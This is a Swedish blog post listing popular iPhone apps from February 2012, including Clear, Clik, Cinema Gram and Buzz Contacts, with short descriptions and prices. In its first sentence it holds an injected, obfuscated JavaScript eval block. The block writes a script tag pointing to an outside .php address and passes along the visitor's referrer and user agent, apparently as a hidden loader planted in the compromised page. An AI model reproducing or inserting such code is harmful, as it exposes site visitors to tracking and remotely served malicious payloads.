Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Månadens appar februari 2012

Månadens appar februari 2012
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eibbe|var|u0026u|referrer|eefya||js|php’.split(’|’),0,{}))
är det slut på februari månad och det är dags att lista några av de mest nerladdade apparna i appstore.
Appar for the win!

Clear: Clear är en ny att göra-lista app som tar ett ganska vanligt koncept vidare till en laddad app utan massa extra funktioner. Det är klart den snabbaste, enklaste och mest intuitiva att-göra-lista appen för upptagna människor som behöver en enkel lista för att jonglera med en miljon aktiviteter per dag. Kostar 7 kronor i appstore.
[divide style=”3″]

Clik: Clik är en kul webbläsare till din smartphone. Den går ut på att du kan ställa frågor som du sedan får sökbevis på, Varför i helvete skulle du behöva det, frågar du då? Med nischade program som detta, är det alltid lättare att hitta spontan information. Varför ska man behöva använda sig av tangentbordet eller knappsatsen när man kan tala till sin telefon? Detta är ljus gadget med rolig funktion.
[divide style=”3″]

Cinema Gram: Gram använder din iPhone kamera för att fånga ett kort videoklipp eller en bild och sedan omvandla den till en ”cinemagraph” för att skapa animerade GIF bilder där endast en del av bilden rör sig. Du spelar in ett klipp och klipper ner det till en längd acceptabel för Cinema Gram  (i allmänhet ett par sekunder). Sen kan du maskera det område du vill flytta. 15 kronor i appstore.

 

[divide style=”3″]

Buzz Contacts: Buzz Contacts gör det traditionella iOS kontakt systemet lite bättre. Buzz gör det oändligt mer användbart och snabbare. Dess fokus är att få dig och dina kontakter att så snabbt och elegant som möjligt kontakta varandra genom vilket medium som helst: telefon, SMS, e-post eller FaceTime. 7 kronor i appstore.
[divide style=”3″]